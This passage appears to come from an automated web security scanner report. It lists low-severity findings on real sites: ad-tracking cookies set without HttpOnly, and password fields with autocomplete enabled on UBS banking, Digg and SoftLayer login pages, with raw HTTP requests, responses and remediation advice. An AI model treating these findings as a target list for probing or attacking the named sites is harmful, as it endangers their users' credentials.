Eibl5r00ChmOkCE37PQIS6dq7wPT-1B87w3eSIvWRK6JC2t1oeUqveL4vnLZ7v2BI8mOR_5Vtk4hl7LQbH47KHn9mApouFIrwoHgitvHAehUtrZB2pIKMrOd4ecGu_5Td_uxCtmy4XXdxPxi6IKIjh7TJldhJ1GEczWVD_bGDc5v-2kLO9WqTDY302oYnzhwqCcIDoCNscaj0YzBqlfTzIyDrkH8vxatsKDAXQ4Jtsl3_oK7x_ip5W7JjCcrLcd7TBTL-_O684O_LyajFvidwb0lwMpvI_qobXEf8vwpXx6CjgObJXPAwErnDdRiZXG6Rzjlrpvxx7MGKC7oc-DJnbgu8dTjdEu82cH1uuItohCE1GVLsDIM9OdE-Q70TxRIlHcKuOK0l22qglRvlRyVeDa5R_skBBpROqVdegphoCA2EMAYy34m3C8AxbQVXv2tLid0B5RDfv1jI7nqI1f-8CctWfpBr-abLfwawha_eevSu-BeNRGS6-l3e5LdUzjTr5IHUlZPEoPSUcuuHcGVq3GMZ6CGJzLxK1NMIN_YWa2WWtfKqGIbTsLzoX0-JPgHLZuqjGn3YuU0loBjwMsmJ7XoXxix2tpkkNV5h1NZXB331PWryy2AG1BPJuJLVT4zIbE77kZcMZssTCDF_zNzv-hOQROl4HLc4UEWkb-u9aQ2rlen_mi55lWZqga_d0hTj-SD3oxsmwzn6Nq55trU-j1GQDzb1_ZvVwhRx0Q_uptE48rH8XCjOJUjQpNRLtZUDvekFZYlXQhitDAZOk6GY0VvVV0mCTSvypWIKrmyCjnr_gKagRSe4UTtSCll_gcGWTDNHC7qecFGk6z3e4O0QjMPBVo19szbTqBQzKlRSAllb1lD1Roagx8HVZqckVirWevftR-aku-hH_QPd78uCldR6o9Qveax8GXpS-aKypm31G_2IGt-C8CPV-k7sgwePfDaD07bFLHwbqeTRWrco6_yM2p6Eot3ZwbE8FNSMSRIUsVwczLLGyq-r3M1YwftiV7Mf5QNKakiimAbPOjWExPrbATLtIx3O0c7l-xfe6kPje8Lja2G_-zUipKgOcNMCj-oHgdiHJqq2uIgWnKHornuDOeLaiUkHIWVvckwkpCJBC2lm-u9i2rrm29_ZDe5dliakw6C2Rj8twiLlfzlikzpR7JfAp40cJcV6GlW0tIfGplg51pTREVDGmHH4AODXGdnK9TWlENpzw35TNdxfAxeUs1cPEOi64rainP0SCUkAmOLbuWn7tumbrHggoOTL0WyCGh3thvCqRtyaVRZz-2-3jDxWUSFOnuPF3ocmPNwA_bOdm7YVJUp4jOEdBZiYsXssmmvAyBz0cS2i2Tg9SBfWFvM_sO8OKD15OvQrtoSZMz5FTL-BuuozwA6N992I4-6hay9R2qPdJa0ze6SLrcfsCWB4Ky3zErqDyKQ9H0wl5_pELpIMT-1qNVdptv-2EVPdJHgZb0fdvbb_D05T4qw5NQ4IrYDRR6LV3elq1du1FqUseWHsqUVdnaZ2p6yXCUtvl4kPfb3QvIQhlltw8I1JpUh0NabZ58BmDwzPN5xltYK_LIcmdq_cpCxj7gQ2WlhFEkoKakhmHHWFkCePG_lq0jHRCZqo4u7okLdFJqi-23qryL4RN3Z0_aFQqDJg0rCBPD3aZqwLxsqDIrP0omCCN4boCegtfrjelXIeOuxrabXhN352MSihMc3-CVcb_kL5lOT9YcyoeJCg59Ijq8T2zgbVOU6zwBc9BcCnSWHFJw_RNB4fezftLML9d5dfvImsTPPvytRq-SoKYxwTHeA0JV-k-xaXuxkj_GEZSFgKdvBKHx9YsruAWjGFxZI0LubOY8fcDAh6xXzWCLVyQcJ-4oTSkYea1NH6xrxdYAaCV1D2k5am92malOiIupL4cMEfCOY7PzeBIuEFG_TjYOgum33GKCIuS7h__v7R45kyBgr7GCpwTTxWPWsVXGEu3LV_WOrXIlPfB_scXK7chTLmYhurC2Xmi93xEyKCpBoulsldLgoWwnRjkFUAbIECT6iggql6xRUe762UGNEynlJ5s-S_H9UP9RUUV02QidOFo-W0MGae-aRTNY2Bw09vXCoTf8EnEVDK1AK-L1; Domain=.turn.com; Expires=Mon, 02-Jan-2012 15:39:04 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.69. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

uid=4325897289836481830; Domain=.turn.com; Expires=Mon, 02-Jan-2012 11:21:55 GMT; Path=/
rrs=3%7C6%7C9%7C12%7C1002%7C1005%7C1008%7C1%7C4%7C7%7C10%7C13%7C1003%7C1006%7C18%7C2%7C5%7C1001%7C1004%7C1007; Domain=.turn.com; Expires=Mon, 02-Jan-2012 11:21:55 GMT; Path=/
rds=15156%7C15153%7C15156%7C15156%7C15161%7C15153%7C15149%7C15146%7C15151%7C15156%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153; Domain=.turn.com; Expires=Mon, 02-Jan-2012 11:21:55 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.70. http://rs.gwallet.com/r1/pixel/x1094 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rs.gwallet.com
Path:	/r1/pixel/x1094

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ra1_uid=4626038992661376064; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1
ra1_sgm=i4-b510-7K0-e5r0-I3r0; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.71. http://rs.gwallet.com/r1/pixel/x1225 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rs.gwallet.com
Path:	/r1/pixel/x1225

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ra1_uid=4626038992661376064; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1
ra1_sgm=i4-b510-7K0-e5r0-I3r0; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: application/octet-stream
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Location: http://bstats.adbrite.com/adserver/behavioral-data/0?d=48272602;bapid=12553;uid=1030306;neg=1
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4626038992661376064; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=i4-b510-7K0-e5r0-I3r0; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=3; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1

10.72. http://rs.gwallet.com/r1/pixel/x368 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rs.gwallet.com
Path:	/r1/pixel/x368

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ra1_uid=4626038992661376064; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1
ra1_sgm=i4-b510-7K0-e5r0-I3r0; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: application/octet-stream
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Location: http://rs.gwallet.com/r1/pixel/x1094?r1s=enJsne_2xin_W0gqpJPdDOiRtZgEH_OufcvtkeNI5aQ
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4626038992661376064; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=i4-b510-7K0-e5r0-I3r0; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=3; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1

10.73. http://rs.gwallet.com/r1/pixel/x369 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rs.gwallet.com
Path:	/r1/pixel/x369

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ra1_uid=4626038992661376064; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1
ra1_sgm=i4-b510-7K0-e5r0-I3r0; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: application/octet-stream
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Location: http://rs.gwallet.com/r1/pixel/x1225?r1s=OUPv0729NeoDz8CeIHHoYeiRtZgEH_OufcvtkeNI5aQ
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4626038992661376064; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=i4-b510-7K0-e5r0-I3r0; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=3; Expires=Thu, 05-Jul-2012 15:39:03 GMT; Path=/; Domain=gwallet.com; Version=1

11. Password field with autocomplete enabled previous next
There are 26 instances of this issue:

https://clientlogin.ibb.ubs.com/login
http://digg.com/
http://digg.com/login
http://digg.com/login
http://digg.com/register
http://digg.com/register
http://digg.com/search
http://digg.com/submit
http://digg.com/submit
http://digg.com/submit
http://digg.com/topic
http://digg.com/upcoming
https://foton-ewm-es.ubs.com/safe-login/Login
https://fundgate.ubs.com/GIS/Default.aspx
https://manage.softlayer.com/
https://manage.softlayer.com/Sales/orderComputingInstance
https://manage.softlayer.com/index/index
http://manage.softlayer.mobi/
https://onlineservices.ubs.com/olsauth/ex/pbl/lo
https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dfp
https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dfu
https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dfu
https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dl
https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pfu
https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pfu
https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pl

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

11.1. https://clientlogin.ibb.ubs.com/login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://clientlogin.ibb.ubs.com
Path:	/login

Issue detail

The page contains a form with the following action URL:

https://clientlogin.ibb.ubs.com/login

The form contains the following password field with autocomplete enabled:

Request

GET /login?_URI=aHR0cDovL2NsaWVudHBvcnRhbC5pYmIudWJzLmNvbS9wb3J0YWwvaW5kZXguaHRtP3BhZ2U9aG9tZQ%3D%3D HTTP/1.1
Host: clientlogin.ibb.ubs.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981875202:ss=1309981804815

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:51:28 GMT
Server: Apache
Pragma: no-cache
Cache-control: no-cache
P3P: CP="OTI DSP COR BUS CUR OUR"
Connection: close
Content-Type: text/html; charset=iso-8859-1
Expires: Wed, 06 Jul 2011 13:51:28 GMT
Content-Length: 6419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<div class="formElement" style="border-top: 2px solid #99adc2;">
                   <form name="login_form" action="/login" method="post">
                   <input type="hidden" name="_URI" value="aHR0cDovL2NsaWVudHBvcnRhbC5pYmIudWJzLmNvbS9wb3J0YWwvaW5kZXguaHRtP3BhZ2U9aG9tZQ==" />
...[SNIP]...
</label><input name="_A2" id="password" type="password" class="textField" value="" /></p>
...[SNIP]...

11.2. http://digg.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://digg.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://digg.com/

The form contains the following password field with autocomplete enabled:

password

Request

GET / HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.3. http://digg.com/login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://digg.com
Path:	/login

Issue detail

The page contains a form with the following action URL:

http://digg.com/login

The form contains the following password field with autocomplete enabled:

password

Request

GET /login HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.4. http://digg.com/login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://digg.com
Path:	/login

Issue detail

The page contains a form with the following action URL:

http://digg.com/ajax/auth/prepare/digg

The form contains the following password field with autocomplete enabled:

password

Request

GET /login HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.5. http://digg.com/register previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://digg.com
Path:	/register

Issue detail

The page contains a form with the following action URL:

http://digg.com/register

The form contains the following password field with autocomplete enabled:

password

Request

GET /register HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.6. http://digg.com/register previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://digg.com
Path:	/register

Issue detail

The page contains a form with the following action URL:

http://digg.com/ajax/auth/register

The form contains the following password field with autocomplete enabled:

password-register

Request

GET /register HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.7. http://digg.com/search previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://digg.com
Path:	/search

Issue detail

The page contains a form with the following action URL:

http://digg.com/search

The form contains the following password field with autocomplete enabled:

password

Request

GET /search HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.8. http://digg.com/submit previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The page contains a form with the following action URL:

http://digg.com/submit?phase=2&url=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US&title=presspass+controls+-+Microsoft+Search

The form contains the following password field with autocomplete enabled:

password

Request

GET /submit?phase=2&url=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US&title=presspass+controls+-+Microsoft+Search HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=27224 10.2.129.76
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8985

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

11.9. http://digg.com/submit previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The page contains a form with the following action URL:

http://digg.com/submit?phase=2&url=https://www.microsoft.com/presspass/presskits/DCU/default.aspx

The form contains the following password field with autocomplete enabled:

password

Request

Response

11.10. http://digg.com/submit previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The page contains a form with the following action URL:

http://digg.com/submit

The form contains the following password field with autocomplete enabled:

password

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=21932 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8554

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

11.11. http://digg.com/topic previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://digg.com
Path:	/topic

Issue detail

The page contains a form with the following action URL:

http://digg.com/topic

The form contains the following password field with autocomplete enabled:

password

Request

GET /topic HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.12. http://digg.com/upcoming previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://digg.com
Path:	/upcoming

Issue detail

The page contains a form with the following action URL:

http://digg.com/upcoming

The form contains the following password field with autocomplete enabled:

password

Request

GET /upcoming HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.13. https://foton-ewm-es.ubs.com/safe-login/Login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://foton-ewm-es.ubs.com
Path:	/safe-login/Login

Issue detail

The page contains a form with the following action URL:

https://foton-ewm-es.ubs.com/safe-login/Login?handler=SAFELogin&locale=es_ES

The form contains the following password field with autocomplete enabled:

SAFEUserPassword

Request

GET /safe-login/Login?handler=SAFEGetLogin HTTP/1.1
Host: foton-ewm-es.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

<html>
<head>
<title>Bienvenido a UBS Bank, S.A.</title>
<meta pageName='login-Login'>
<meta serviceTime='0'>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link
...[SNIP]...
</td>
                                    <FORM name="LoginForm" method="post" action="/safe-login/Login?handler=SAFELogin&locale=es_ES">
                                    <INPUT type="hidden" name="handler" value="SAFELogin">
...[SNIP]...
<td align="right">
           <INPUT type="password" name="SAFEUserPassword" value='' size='20' maxlength='20'><br>
...[SNIP]...

11.14. https://fundgate.ubs.com/GIS/Default.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://fundgate.ubs.com
Path:	/GIS/Default.aspx

Issue detail

The page contains a form with the following action URL:

https://fundgate.ubs.com/webauthentication

The form contains the following password fields with autocomplete enabled:

pin
tokencode

Request

GET /GIS/Default.aspx HTTP/1.1
Host: fundgate.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:09:06 GMT
Server: Apache
Pragma: no-cache
Cache-control: no-cache,max-age=0,must-revalidate
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Expires: 0
Content-Length: 11137
Content-Type: text/html
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
   <meta name="robots" content="noindex,nofollow"><title>UBS Global Asset Managem
...[SNIP]...
<div class="gkkContent">
                                                                               <FORM name="login" action="/webauthentication" method="POST">
                                                                                   <INPUT TYPE=HIDDEN NAME="stage" VALUE="useridandpasscode">
...[SNIP]...
<td width="210"><input NAME="pin" VALUE="" MAXLENGTH=16 style='width:200px;text-align:left;' type='password' class='waEntryfield'></td>
...[SNIP]...
<td width="210"><input NAME="tokencode" VALUE="" MAXLENGTH=16 onkeypress="return loginpresskey(event);" style='width:200px;text-align:left;' type='password' class='waEntryfield'></td>
...[SNIP]...

11.15. https://manage.softlayer.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://manage.softlayer.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://manage.softlayer.com/index/index

The form contains the following password field with autocomplete enabled:

data[User][password]

Request

GET / HTTP/1.1
Host: manage.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:20:43 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 18394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" version="XHTML+RDFa 1.0" xml:lang="en-us">
<head>
...[SNIP]...
</div>

<form id="index_form" name="data[index][index]_form" action="https://manage.softlayer.com/index/index" method="post"> <table cellpadding="0" cellspacing="0" border="0" width="95%">
...[SNIP]...
<span class="Text11Pt"><input type="password" id="user_password" name="data[User][password]" size="12" style="margin-bottom: 6px;" tabIndex="2" /></span>
...[SNIP]...

11.16. https://manage.softlayer.com/Sales/orderComputingInstance previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://manage.softlayer.com
Path:	/Sales/orderComputingInstance

Issue detail

The page contains a form with the following action URL:

https://manage.softlayer.com/index/index

The form contains the following password field with autocomplete enabled:

data[User][password]

Request

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:14:55 GMT
Server: Apache
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 18438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" version="XHTML+RDFa 1.0" xml:lang="en-us">
<head>
...[SNIP]...
</div>

<form id="index_form" name="data[index][index]_form" action="https://manage.softlayer.com/index/index" method="post"> <table cellpadding="0" cellspacing="0" border="0" width="95%">
...[SNIP]...
<span class="Text11Pt"><input type="password" id="user_password" name="data[User][password]" size="12" style="margin-bottom: 6px;" tabIndex="2" /></span>
...[SNIP]...

11.17. https://manage.softlayer.com/index/index previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://manage.softlayer.com
Path:	/index/index

Issue detail

The page contains a form with the following action URL:

https://manage.softlayer.com/index/index

The form contains the following password field with autocomplete enabled:

data[User][password]

Request

GET /index/index HTTP/1.1
Host: manage.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:20:45 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 18404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" version="XHTML+RDFa 1.0" xml:lang="en-us">
<head>
...[SNIP]...
</div>

<form id="index_form" name="data[index][index]_form" action="https://manage.softlayer.com/index/index" method="post"> <table cellpadding="0" cellspacing="0" border="0" width="95%">
...[SNIP]...
<span class="Text11Pt"><input type="password" id="user_password" name="data[User][password]" size="12" style="margin-bottom: 6px;" tabIndex="2" /></span>
...[SNIP]...

11.18. http://manage.softlayer.mobi/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://manage.softlayer.mobi
Path:	/

Issue detail

The page contains a form with the following action URL:

http://manage.softlayer.mobi/index/index?cacheKey=

The form contains the following password field with autocomplete enabled:

data[User][password]

Request

GET / HTTP/1.1
Host: manage.softlayer.mobi
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.19. https://onlineservices.ubs.com/olsauth/ex/pbl/lo previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/olsauth/ex/pbl/lo

Issue detail

The page contains a form with the following action URL:

https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pl

The form contains the following password field with autocomplete enabled:

password

Request

GET /olsauth/ex/pbl/lo HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:08:01 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"

<html>

   <HEAD>
       <title>Online Services Login</title>
       <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
       <SCRIPT language="JavaScript" SRC='/olsauth/
...[SNIP]...

                       <form name="loginForm" id="loginForm" method="post" action="/olsauth/ex/pbl/ubso/pl">



...[SNIP]...
<TD style="WIDTH: 151px" align="right" colSpan="4" height="17">
           <input type="password" name="password" maxlength="15" tabindex="2" value="" style="height:15px;width:144px;WIDTH: 144px; HEIGHT: 15px">
       </TD>
...[SNIP]...

11.20. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dfp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/olsauth/ex/pbl/ubso/dfp

Issue detail

The page contains a form with the following action URL:

https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pl

The form contains the following password field with autocomplete enabled:

password

Request

GET /olsauth/ex/pbl/ubso/dfp HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
connection: close
content-language: en
content-type: text/html;charset=ISO-8859-1
date: Wed, 06 Jul 2011 14:07:59 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"

<html>

   <HEAD>
       <title>Online Services Login</title>
       <LINK href="/olsauth/public/common/js/ubs_styles.css" type="text/css" rel="stylesheet">
       <SCRIPT language="JavaScript" SRC='/olsauth/
...[SNIP]...

                       <form name="loginForm" method="post" action="/olsauth/ex/pbl/ubso/pl">



...[SNIP]...
<TD style="WIDTH: 151px" align="right" colSpan="4" height="17">
           <input type="password" name="password" maxlength="15" tabindex="2" value="" style="height:15px;width:144px;WIDTH: 144px; HEIGHT: 15px">
       </TD>
...[SNIP]...

11.21. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dfu previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://onlineservices.ubs.com
Path:	/olsauth/ex/pbl/ubso/dfu

Issue detail

The page contains a form with the following action URL:

https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pfu

The form contains the following password field with autocomplete enabled:

userPassword

Request

